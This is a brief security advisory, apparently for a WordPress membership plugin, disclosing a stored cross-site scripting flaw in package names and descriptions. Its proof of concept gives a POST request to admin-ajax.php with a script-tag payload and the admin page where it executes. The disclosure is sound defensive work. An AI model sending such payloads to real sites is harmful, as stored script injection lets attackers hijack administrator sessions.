Description
Once a user is registered he can add new subscription packages or modify existing ones. No data sanitization is taking place before saving package details in DB. This allows a malicious user to include JS code in package name and/or package description.
PoC
- Send a post request to
http://vuln.site.tld/wp-admin/admin-ajax.php
with data:
action=package_add_new&p_name=a<script>alert(1)</script>
- Visit
http://vuln.site.tld/wp-admin/admin.php?page=userultra&tab=membership
as admin or go to the page that
contains package information at front end.